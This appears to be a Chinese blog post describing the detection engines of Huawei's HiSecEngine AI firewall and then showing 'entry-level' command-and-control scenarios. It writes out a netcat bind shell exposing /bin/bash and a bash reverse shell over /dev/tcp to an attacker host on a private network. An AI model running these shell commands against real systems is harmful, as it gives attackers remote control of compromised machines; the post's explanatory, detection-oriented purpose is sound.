C&C驻点你应该知道的事

最近被华为HiSecEngine^[1] AI防火墙刷爆了朋友圈，它内置了三大威胁防御引擎，分别是NGE、CDE和AIE。以下是自己的理解，可能说的不对，欢迎留言讨论。

• NGE：作为NGFW检测引擎，提供IPS、反病毒和URL过滤等内容安全相关的功能

大白话说：就是特征库检测

• CDE：可提供数据深度分析，暴露威胁的细节，快速检测恶意文件

大白话说：就是沙箱检测

• AIE：APT威胁检测引擎，针对暴力破解、C&C、DGA域名和加密威胁流量进行检测

大白话说：就是AI行为检测

对AIE引擎颇有兴趣，有监督的有3类：

• 失陷主机检测：失陷后的行为比较诡异，可能C&C，也可能转移，不知道华为怎么定义？
• C&C通道检测：失陷后为了维持权限，种下的后门程序，这是一个比较明确的突破口。
• 加密外发检测：正在学习...

无监督的有1类：

• 暴力破解检测：对RDP、SSH等流量进行K-Means聚类？

攻击矩阵：

信息收集、扫描探测、边界突破、建立驻点、权限提升、内部转移、数据盗取、数据外发。

入门级的C&C场景^[2]：

点个赞呗，待会来写高级部分

场景一：失陷主机在非军事区

• 公网服务器失陷，攻击者成功入侵后，将bash发布出去，等待控制端来连接

nc -lvvp 2019 -t -e /bin/bash

• 攻击者控制端（103），主动连接失陷服务器（105）

nc 192.168.0.105 2019

• 此时，后门已经稳定建立了，失陷主机的2019端口一直打开着，任何人都能控制它

场景二：失陷主机在内网

• 攻击者控制端（103）主动监听2019端口，等待失陷主机（105）来舔

nc -vlp 2019

• 失陷主机（105）舔攻击者控制端（103）

bash -i >& /dev/tcp/192.168.0.103/2019 0>&1

• 此时，后门已经稳定建立了，失陷主机（105）与攻击者（103）一直保持着连接

带货环节: